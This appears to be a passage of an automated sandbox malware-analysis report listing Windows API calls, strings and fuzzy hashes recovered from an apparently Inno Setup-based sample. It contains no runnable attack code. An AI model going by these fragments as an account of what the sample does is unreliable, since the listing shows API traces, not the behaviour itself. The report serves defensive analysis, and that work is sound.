                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                                    • API String ID: 4190037839-2312295185
                                                                                                    • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                    • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                                    • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                    • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                                    APIs
                                                                                                    • GetActiveWindow.USER32 ref: 004629FC
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                    • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                    • API String ID: 2610873146-3407710046
                                                                                                    • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                    • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                                    • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                    • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                                    APIs
                                                                                                    • GetActiveWindow.USER32 ref: 0042F194
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                    • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                    • API String ID: 2610873146-3407710046
                                                                                                    • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                    • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                                    • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                    • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02113858,00000000), ref: 00458C79
                                                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                                      • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                                                    • API String ID: 2182916169-3012584893
                                                                                                    • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                    • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                                    • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                    • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                                    • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                                    • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                                      • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                    • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                    • API String ID: 1914119943-2711329623
                                                                                                    • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                    • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                                    • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                    • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                                    APIs
                                                                                                    • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                                    • SaveDC.GDI32(?), ref: 00416E27
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                                    • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                                    • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                                    • DeleteObject.GDI32(?), ref: 00416F22
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                                    • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                                    • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 375863564-0
                                                                                                    • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                    • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                                    • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                    • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                    • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                    • String ID:
                                                                                                    • API String ID: 1694776339-0
                                                                                                    • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                    • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                    • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                    • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                    APIs
                                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$EnableItem$System
                                                                                                    • String ID:
                                                                                                    • API String ID: 3985193851-0
                                                                                                    • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                    • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                                    • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                    • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                                    • SendNotifyMessageA.USER32(000103F2,00000496,00002710,00000000), ref: 00481A97
                                                                                                    Strings
                                                                                                    • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                                    • DeinitializeSetup, xrefs: 0048190D
                                                                                                    • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                                    • Restarting Windows., xrefs: 00481A72
                                                                                                    • Deinitializing Setup., xrefs: 00481872
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary$MessageNotifySend
                                                                                                    • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                    • API String ID: 3817813901-1884538726
                                                                                                    • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                                    • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                                    • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                                    • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                                    APIs
                                                                                                    • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                                    • GetActiveWindow.USER32 ref: 0046172B
                                                                                                    • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                                    • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                                    • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                                    • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                                    • String ID: A
                                                                                                    • API String ID: 2684663990-3554254475
                                                                                                    • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                    • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                                    • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                    • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                                      • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                                      • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                    • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                    • API String ID: 884541143-1710247218
                                                                                                    • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                                    • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                                    • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                                    • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                                    • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                    • API String ID: 190572456-3516654456
                                                                                                    • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                    • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                                    • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                    • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                                    APIs
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                                    • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                                    • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                                    • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
